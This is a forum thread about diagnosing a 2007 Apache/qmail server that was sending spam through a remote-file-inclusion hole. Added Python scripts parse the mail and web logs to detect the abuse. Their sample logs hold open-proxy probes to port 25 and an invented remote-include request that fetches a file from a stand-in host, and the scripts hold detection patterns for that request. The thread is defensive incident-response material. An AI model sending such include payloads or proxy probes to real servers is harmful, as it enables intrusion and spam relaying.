  1. #1

    Apache Sending Spam

    Yesterday my mail logs started showing many a spam email being sent from my server. There isn't anything mission critical running on it, so I took down qmail until I could find the vulnerability and fix it. But try as I might, I haven't found any conclusive vulnerability, so I thought to ask here where someone with more experience might spot something obvious that I've missed (I'm still somewhat new to this).

    Anyway, the qmail logs show that the messages came from uid 48, apache. Log excerpt (sending of first spam mail):
    Aug 28 11:10:51 host qmail-queue[8056]: mail: all addreses are uncheckable - need to skip scanning (by deny mode)
    Aug 28 11:10:51 host qmail-queue[8056]: scan: the message(drweb.tmp.TNDOi2) sent by anonymous@HOSTNAME to SPAMADDRESS should be passed without checks, because contains uncheckable addresses
    Aug 28 11:10:51 host qmail: 1188295851.742521 new msg 51970054
    Aug 28 11:10:51 host qmail: 1188295851.742679 info msg 51970054: bytes 445 from <anonymous@HOSTNAME> qp 8057 uid 48
    Aug 28 11:10:51 host qmail: 1188295851.752799 starting delivery 460: msg 51970054 to remote SPAMADDRESS
    Aug 28 11:10:51 host qmail: 1188295851.752933 status: local 0/10 remote 1/20
    Unfortunately, my Apache logs have no entries around the time when these messages were sent. There are some suspect "CONNECT" requests scattered throughout the logs, but all are denied with 405's, and none correspond exactly with the time of the spam. Example (from about 3 hours after the spam):
    210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "CONNECT 205.158.62.146:25 HTTP/1.0" 405 235 "-" "-"
    210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "PUT http://205.158.62.146:25/ HTTP/1.0" 405 231 "-" "-"
    210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "POST http://205.158.62.146:25/ HTTP/1.0" 200 2 "-" "-"
    (The fact that the final query wasn't denied worries me slightly though. Does anyone have any insight?)

    I'm not sure where to go from here. I'm concerned about the lack of logs by Apache. There's a nine hour period without any entries; not unusual for my server given that it's not very active, but the time when the spam was sent falls in this time period. I've checked for common security issues, but qmail is configured only to relay from localhost, and Apache isn't configured as an open proxy. Are there any other common issues I should check for? Is there any other information I should post here to help identify the problem?

    I'm running Apache version 2.0.52, and qmail 1.03.

    I'd be very grateful for any help or links to relevant HOWTOs.
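    The qmail excerpt above already contains the key evidence: the "info msg" line records the uid that injected each message, and here it is 48 (apache on this host), not a mail user. The following script is an added example, not code from the thread or from qmail, that pulls that attribution out of qmail-send log lines and pairs it with the "starting delivery" lines, so you can list every message a non-mail uid pushed to a remote recipient and count remote deliveries per uid. The sample log is constructed from the two lines in the post plus invented entries with placeholder addresses; the set of uids allowed to inject mail (EXPECTED_UIDS) is an assumption you would adjust for your own box.

```python
import re
from collections import Counter

# qmail-send "info msg" line: which uid injected the message and with what envelope sender.
INFO_RE = re.compile(
    r"qmail: \d+\.\d+ info msg (?P<msg>\d+): bytes (?P<bytes>\d+) "
    r"from <(?P<sender>[^>]*)> qp \d+ uid (?P<uid>\d+)"
)
# qmail-send delivery line: where the message went (local or remote) and to whom.
DELIVERY_RE = re.compile(
    r"qmail: \d+\.\d+ starting delivery \d+: msg (?P<msg>\d+) "
    r"to (?P<kind>local|remote) (?P<rcpt>\S+)"
)

# Assumption for this example: only root (cron output etc.) is expected to inject mail here.
# On the poster's host uid 48 is apache, which should never be sending mail at all.
EXPECTED_UIDS = {0}

# Constructed sample: the lines quoted in the post, plus an invented legitimate root message
# and a second invented web-server message. Addresses are placeholders.
SAMPLE_LOG = """\
Aug 28 11:10:51 host qmail: 1188295851.742521 new msg 51970054
Aug 28 11:10:51 host qmail: 1188295851.742679 info msg 51970054: bytes 445 from <anonymous@HOSTNAME> qp 8057 uid 48
Aug 28 11:10:51 host qmail: 1188295851.752799 starting delivery 460: msg 51970054 to remote SPAMADDRESS
Aug 28 11:10:51 host qmail: 1188295851.752933 status: local 0/10 remote 1/20
Aug 28 11:12:03 host qmail: 1188295923.100001 new msg 51970055
Aug 28 11:12:03 host qmail: 1188295923.100002 info msg 51970055: bytes 812 from <root@HOSTNAME> qp 8101 uid 0
Aug 28 11:12:03 host qmail: 1188295923.100003 starting delivery 461: msg 51970055 to local admin@HOSTNAME
Aug 28 11:13:40 host qmail: 1188296020.200001 new msg 51970056
Aug 28 11:13:40 host qmail: 1188296020.200002 info msg 51970056: bytes 460 from <anonymous@HOSTNAME> qp 8120 uid 48
Aug 28 11:13:40 host qmail: 1188296020.200003 starting delivery 462: msg 51970056 to remote SPAMADDRESS2
"""


def parse_qmail_log(lines):
    """Return {msg_id: {'sender', 'uid', 'bytes', 'recipients': [(kind, rcpt), ...]}}."""
    msgs = {}
    for line in lines:
        m = INFO_RE.search(line)
        if m:
            msgs[m['msg']] = {'sender': m['sender'], 'uid': int(m['uid']),
                              'bytes': int(m['bytes']), 'recipients': []}
            continue
        d = DELIVERY_RE.search(line)
        if d and d['msg'] in msgs:
            msgs[d['msg']]['recipients'].append((d['kind'], d['rcpt']))
    return msgs


def flag_unexpected_injectors(msgs, expected_uids=EXPECTED_UIDS):
    """Messages injected by a uid that has no business sending mail, with their remote recipients."""
    hits = []
    for msg_id, info in sorted(msgs.items()):
        if info['uid'] not in expected_uids:
            remote = [rcpt for kind, rcpt in info['recipients'] if kind == 'remote']
            hits.append((msg_id, info['uid'], info['sender'], remote))
    return hits


def remote_count_by_uid(msgs):
    """Remote deliveries caused by each uid; a web-server uid with a high count is the tell."""
    counts = Counter()
    for info in msgs.values():
        counts[info['uid']] += sum(1 for kind, _ in info['recipients'] if kind == 'remote')
    return counts


if __name__ == '__main__':
    parsed = parse_qmail_log(SAMPLE_LOG.splitlines())
    for msg_id, uid, sender, remote in flag_unexpected_injectors(parsed):
        print(f"msg {msg_id}: uid {uid} <{sender}> -> {', '.join(remote) or 'no remote delivery'}")
    print(dict(remote_count_by_uid(parsed)))
```

    Run it over the real log with `parse_qmail_log(open('/var/log/maillog'))` (path is an assumption; use wherever splogger writes on your system). Since qmail here only relays from localhost, a message with uid 48 can only have come from something running under Apache, which is why the web logs, not qmail's relay rules, are the place to look next.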

  2. #2
    It would appear that someone's trying to hack you. The fact that your server is still online should be assurance that they've not succeeded.

  3. #3
    Quote Originally Posted by psychomarine View Post
    It would appear that someone's trying to hack you. The fact that your server is still online should be assurance that they've not succeeded.
    Incorrect. They are trying to connect and relay mail, and being "on line" doesn't mean a server isn't hacked. Not all hacking kills the box it's done to; in fact, what would be the point?

  4. #4
    idk, whatever I gain access to, I ruin, so forgive me for assuming that others don't.

  5. #5
    Quote Originally Posted by bear View Post
    Incorrect. They are trying to connect and relay mail, and being "on line" doesn't mean a server isn't hacked. Not all hacking kills the box it's done to; in fact, what would be the point?
    I agree; most people who gain access to a server mostly use it for the following:

    1) To run ircd bots
    2) To use it for DoS
    3) To use it to send spam mails/phishing emails
    4) To host phishing pages

    There are very few incidents where the "hacker" ruins the server.

  6. #6
    Quote Originally Posted by jtobin View Post
    Yesterday my mail logs started showing many a spam email being sent from my server. There isn't anything mission critical running on it, so I took down qmail until I could find the vulnerability and fix it. But try as I might, I haven't found any conclusive vulnerability, so I thought to ask here where someone with more experience might spot something obvious that I've missed (I'm still somewhat new to this).

    Anyway, the qmail logs show that the messages came from uid 48, apache. Log excerpt (sending of first spam mail):
    Unfortunately, my Apache logs have no entries around the time when these messages were sent. There are some suspect "CONNECT" requests scattered throughout the logs, but all are denied with 405's, and none correspond exactly with the time of the spam. Example (from about 3 hours after the spam):
    (The fact that the final query wasn't denied worries me slightly though. Does anyone have any insight?)

    I'm not sure where to go from here. I'm concerned about the lack of logs by Apache. There's a nine hour period without any entries; not unusual for my server given that it's not very active, but the time when the spam was sent falls in this time period. I've checked for common security issues, but qmail is configured only to relay from localhost, and Apache isn't configured as an open proxy. Are there any other common issues I should check for? Is there any other information I should post here to help identify the problem?

    I'm running Apache version 2.0.52, and qmail 1.03.

    I'd be very grateful for any help or links to relevant HOWTOs.
    Check your mail logs as well; also paste the output of the ps aux command. Also look at your /tmp folder for any hacks or suspicious files.

  7. #7
    I hadn't realised that if you give a log file in a vhost entry in Apache, that takes priority over the main log file, so the relevant logs were stored elsewhere. Once I found this, I quickly saw that someone was exploiting a vulnerable script to include remote files. The script in question is removed now, but I'm not sure how much damage they managed to do. Most of the scripts they used were designed for sending spam. Since the script was taken down, no more spam has been sent (that is, every remote email listed in the mail logs since then is legitimate). Still, I'm concerned that someone may be using the server to other ill ends, through whatever access they may have managed to get through the scripts.

    I've checked netstat, and all of the programs listening seem to be legitimate. rkhunter (fully updated) gave it a clean bill of health, apart from some out-dated software. None of the running processes jump out at me as malicious either, but I'm not very experienced so I've included the output to ps aux as requested:

    USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
    root 1 0.0 0.0 1616 612 ? Ss Sep01 0:00 init [3]
    root 5399 0.0 0.0 1520 544 ? Ss Sep01 0:00 syslogd -m 0
    named 7687 0.0 0.3 37028 3544 ? Ssl Sep01 0:02 /usr/sbin/named -u named -c /etc/named.conf -u named -t /var/named/run-root
    root 7700 0.0 0.1 3988 1060 ? Ss Sep01 0:00 /usr/sbin/sshd
    root 7710 0.0 0.0 2068 828 ? Ss Sep01 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
    root 7804 0.0 0.1 2140 1112 ? S Sep01 0:00 /bin/sh /usr/bin/mysqld_safe --defaults-file=/etc/my.cnf --pid-file=/var/run/mysqld/mysqld.pid
    mysql 7860 0.0 1.6 104652 17372 ? Sl Sep01 0:53 /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
    root 8129 0.0 0.0 3480 804 ? S Sep01 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd -maxprocs=40 -maxperip=4 -pid=/var/run/imapd.pid -nodnslookup -noidentlookup 143 /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
    root 8131 0.0 0.0 3380 940 ? S Sep01 0:00 /usr/sbin/courierlogger imapd
    root 8146 0.0 0.0 3480 796 ? S Sep01 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=imapd-ssl -maxprocs=40 -maxperip=4 -pid=/var/run/imapd-ssl.pid -nodnslookup -noidentlookup 993 /usr/bin/couriertls -server -tcpd /usr/sbin/imaplogin /usr/lib/courier-imap/authlib/authpsa /usr/bin/imapd Maildir
    root 8148 0.0 0.0 3248 780 ? S Sep01 0:00 /usr/sbin/courierlogger imapd-ssl
    root 8158 0.0 0.0 3480 796 ? S Sep01 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d.pid -nodnslookup -noidentlookup 110 /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
    root 8160 0.0 0.0 3248 780 ? S Sep01 0:00 /usr/sbin/courierlogger pop3d
    root 8169 0.0 0.0 3480 796 ? S Sep01 0:00 /usr/lib/courier-imap/couriertcpd -address=0 -stderrlogger=/usr/sbin/courierlogger -stderrloggername=pop3d-ssl -maxprocs=40 -maxperip=4 -pid=/var/run/pop3d-ssl.pid -nodnslookup -noidentlookup 995 /usr/bin/couriertls -server -tcpd /usr/sbin/pop3login /usr/lib/courier-imap/authlib/authpsa /usr/bin/pop3d Maildir
    root 8172 0.0 0.0 3248 780 ? S Sep01 0:00 /usr/sbin/courierlogger pop3d-ssl
    qmails 8188 0.0 0.0 1496 448 ? S Sep01 0:01 qmail-send
    qmaill 9217 0.0 0.0 1452 436 ? S Sep01 0:00 splogger qmail
    root 9219 0.0 0.0 1480 344 ? S Sep01 0:00 qmail-lspawn ./Maildir/
    qmailr 9220 0.0 0.0 1476 372 ? S Sep01 0:00 qmail-rspawn
    qmailq 9222 0.0 0.0 1444 316 ? S Sep01 0:00 qmail-clean
    root 9364 0.0 1.4 29948 15332 ? Ss Sep01 0:00 /usr/sbin/httpd
    popuser 9482 0.0 2.1 24492 22284 ? Ss Sep01 0:00 /usr/bin/spamd --username=popuser --daemonize --helper-home-dir=/var/qmail --max-children 1 --pidfile=/var/run/spamd/spamd_full.pid --socketpath=/tmp/spamd_full.sock --siteconfigpath=/dev/null
    popuser 9519 0.0 2.1 24436 22228 ? Ss Sep01 0:00 /usr/bin/spamd --username=popuser --daemonize --helper-home-dir=/var/qmail --max-children 1 --pidfile=/var/run/spamd/spamd_light.pid --socketpath=/tmp/spamd_light.sock --siteconfigpath=/dev/null
    popuser 9532 0.0 1.9 24492 20624 ? S Sep01 0:00 spamd child
    popuser 9545 0.0 1.9 24436 20568 ? S Sep01 0:00 spamd child
    root 9621 0.0 0.4 47452 4760 ? Ss Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    psaadm 9625 0.0 1.9 52948 20904 ? S Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    psaadm 9626 0.0 1.8 52768 19024 ? S Sep01 0:01 /usr/local/psa/admin/bin/httpsd
    psaadm 9627 0.0 1.8 51968 19540 ? S Sep01 0:01 /usr/local/psa/admin/bin/httpsd
    psaadm 9628 0.0 2.4 55344 25220 ? S Sep01 0:02 /usr/local/psa/admin/bin/httpsd
    psaadm 9629 0.0 1.8 51724 19608 ? S Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    psaadm 9742 0.0 1.9 52204 20440 ? S Sep01 0:01 /usr/local/psa/admin/bin/httpsd
    drweb 9782 0.0 1.4 18560 15388 ? Ss Sep01 0:54 /opt/drweb/drwebd
    root 9844 0.0 0.0 2456 916 ? Ss Sep01 0:00 crond
    root 9855 0.0 0.0 4032 808 ? Ss Sep01 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a shadow -n 2
    root 9856 0.0 0.0 4032 472 ? S Sep01 0:00 /usr/sbin/saslauthd -m /var/run/saslauthd -a shadow -n 2
    psaadm 7857 0.0 1.0 50140 11044 ? S Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    psaadm 8065 0.0 1.7 51932 18348 ? S Sep01 0:00 /usr/local/psa/admin/bin/httpsd
    apache 13807 0.1 2.1 40404 22284 ? S 08:05 0:43 /usr/sbin/httpd
    apache 22017 0.1 2.1 41484 22984 ? S 08:31 0:44 /usr/sbin/httpd
    apache 9776 0.1 2.1 41576 22868 ? S 09:10 0:40 /usr/sbin/httpd
    apache 28149 0.1 2.2 41468 23628 ? S 09:16 0:35 /usr/sbin/httpd
    apache 29804 0.1 2.0 39040 21140 ? S 14:23 0:09 /usr/sbin/httpd
    Does anything look strange here?

    Finally, /tmp contained a file called 'r00t', which certainly seemed to be the product of some attempt to gain more access. Nothing else jumped out at me, but I doubt every malicious executable is going to be so obviously named.
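    Two things in this thread leave a recognisable shape in Apache's access log: the open-proxy probes from the first post (CONNECT host:port, or a request whose target is a full URL rather than a path), and the remote file inclusion the last post found (a query-string parameter whose value is itself a URL). The script below is an added example, not code from the thread, Apache or any project, that parses common/combined log lines and reports both patterns, marking which ones the server answered with a non-error status, which is the "final query wasn't denied" case from the first post. The sample lines are constructed: the three quoted in the first post, plus a normal request and an invented include-style request using documentation IP addresses and a placeholder script path. Given the vhost lesson above, feed it every CustomLog, not just the main one.

```python
import re
from urllib.parse import parse_qsl

# Apache common/combined log line; the request line is split into method, target and protocol.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A target starting with scheme:// is an absolute-URI (proxy-style) request, not a local path.
ABSOLUTE_URI_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)
# Parameter values of this shape are what a remote-include attempt leaves in the log.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.I)

# Constructed sample: three lines quoted in the first post, one ordinary request, and one
# invented request carrying a URL in a query parameter (hypothetical script path, RFC 5737 IPs).
SAMPLE_LOG = """\
210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "CONNECT 205.158.62.146:25 HTTP/1.0" 405 235 "-" "-"
210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "PUT http://205.158.62.146:25/ HTTP/1.0" 405 231 "-" "-"
210.17.191.242 - - [28/Aug/2007:14:34:43 +0100] "POST http://205.158.62.146:25/ HTTP/1.0" 200 2 "-" "-"
192.0.2.10 - - [28/Aug/2007:11:10:40 +0100] "GET /index.php?page=about HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Aug/2007:11:10:49 +0100] "GET /vhost/inc/page.php?path=http://203.0.113.9/x.txt? HTTP/1.0" 200 5120 "-" "-"
"""


def parse_line(line):
    """Dict of the log fields, or None for lines that are not in common/combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_proxy_probe(rec):
    """True for requests shaped like open-proxy probes: CONNECT host:port or an absolute-URI target."""
    return rec['method'] == 'CONNECT' or bool(ABSOLUTE_URI_RE.match(rec['target']))


def remote_include_params(rec):
    """Query parameters whose value is a remote URL (the remote-file-inclusion shape)."""
    _, _, query = rec['target'].partition('?')
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_SCHEME_RE.match(value)]


def scan(lines):
    """Findings in log order; 'accepted' means the server did not answer with a 4xx/5xx."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        accepted = int(rec['status']) < 400
        if is_proxy_probe(rec):
            findings.append({'ip': rec['ip'], 'kind': 'proxy', 'accepted': accepted,
                             'detail': f"{rec['method']} {rec['target']}"})
        for name, value in remote_include_params(rec):
            findings.append({'ip': rec['ip'], 'kind': 'rfi', 'accepted': accepted,
                             'detail': f"{name}={value}"})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG.splitlines()):
        flag = 'ACCEPTED' if f['accepted'] else 'rejected'
        print(f"{f['ip']:<16} {f['kind']:<5} {flag:<8} {f['detail']}")
```

    A 405 on the CONNECT and PUT lines is Apache refusing the method, which is what you want; the POST that got a 200 was handled by something, so the next step is to check which handler or script answered it. Only the requests the server accepted and that match the include pattern tell you which script was the vulnerable one, and their timestamps are the ones to line up against the uid 48 entries in the qmail log.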
